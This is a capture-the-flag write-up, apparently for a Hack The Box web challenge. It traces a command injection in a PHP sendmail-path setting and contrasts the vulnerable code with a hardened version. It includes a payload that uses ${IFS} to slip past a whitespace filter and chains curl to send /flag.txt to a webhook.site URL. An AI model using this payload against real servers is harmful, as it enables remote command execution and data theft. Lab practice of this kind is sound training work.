Void Whispers
(Very Easy Web Challenge)

OVERVIEW

Download the given files from the site, spawn the instance, and let's check it out.

Hmm, the site lets us send mail through a sendmail path, which looks kinda suspicious.
Let's check the downloaded files to see if there is any vulnerability there.

We found it!
The updateSetting endpoint (challenge/controllers/IndexController.php) reads a user-controlled sendMailPath POST parameter and blindly interpolates it into a shell_exec("which $sendMailPath") call.
Because the application executes a shell command with unsanitized input, this is a command injection vulnerability. The developer attempted to block spaces with preg_match('/\s/'), but that is insufficient: the filter only rejects literal whitespace, so an attacker can use ${IFS} to get whitespace past it and shell metacharacters (e.g. ;) to chain commands.
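The vulnerable pattern described above, placed beside a hardened version, as an added example (this is not the challenge's own code; the function names are assumed):

```php
<?php
// Added example, not the challenge's code: reconstructs the pattern the
// writeup describes (assumed function names; the real controller may differ)
// and shows a hardened version that never hands user input to a shell.

// Vulnerable pattern: rejects literal whitespace only, then interpolates the
// raw value into a shell command. "${IFS}" and ";" pass the regex untouched.
function updateSettingVulnerable(string $sendMailPath): ?string
{
    if (preg_match('/\s/', $sendMailPath)) {
        return null; // "no spaces allowed"
    }
    return shell_exec("which $sendMailPath");
}

// Hardened: strict allowlist on the characters a path may contain, require an
// absolute path, and check it with a filesystem call instead of a shell.
function updateSettingHardened(string $sendMailPath): ?string
{
    // Only letters, digits, "/", ".", "_" and "-"; "$", ";", "{", "}", "`" etc. are rejected.
    if (!preg_match('#\A/[A-Za-z0-9_./-]+\z#', $sendMailPath)) {
        return null;
    }
    // Reject path traversal components.
    foreach (explode('/', $sendMailPath) as $part) {
        if ($part === '..') {
            return null;
        }
    }
    // No shell involved at all: is_executable() answers "which" directly.
    if (!is_executable($sendMailPath)) {
        return null;
    }
    return $sendMailPath;
}

// If a shell command is unavoidable, escapeshellarg() turns the value into a
// single quoted literal argument so metacharacters cannot alter the command line.
function whichSafely(string $sendMailPath): ?string
{
    return shell_exec('which ' . escapeshellarg($sendMailPath));
}
```

The allowlist check is the real fix; escapeshellarg() is the fallback when a shell invocation cannot be removed.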
So we will use this payload:
/usr/sbin/sendmail;curl${IFS}<WEBHOOK-UNIQUE-URL>?flag=$(cat${IFS}/flag.txt)
Now let me explain what a webhook is and where you can get your own unique URL:
A webhook is simply an HTTP endpoint that accepts incoming requests (GET/POST/etc.) so one system can notify or send data to another.
And webhook.site is a public online tool that generates a unique temporary URL for you. When someone (or something) makes an HTTP request to that URL, webhook.site records and displays the full request so you can inspect it.
To obtain your unique URL, visit https://webhook.site (no sign-up needed).

You can also use ngrok as an alternative to webhook.site.
Now let's enter our payload in the Sendmail Path parameter.

This payload /usr/sbin/sendmail;curl${IFS}https://webhook.site/<id>?flag=$(cat${IFS}/flag.txt) will make the server run curl and exfiltrate /flag.txt to my webhook.
Let's send it and see what we get.

We got the message Config updated successfully!
Now let's check webhook.site to see whether we got the flag.

Voilà! We got the flag in the query string (do enter the flag in the HTB{} flag format, as the curly braces are missing from the received value).
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com.
THANKS FOR READING !!!
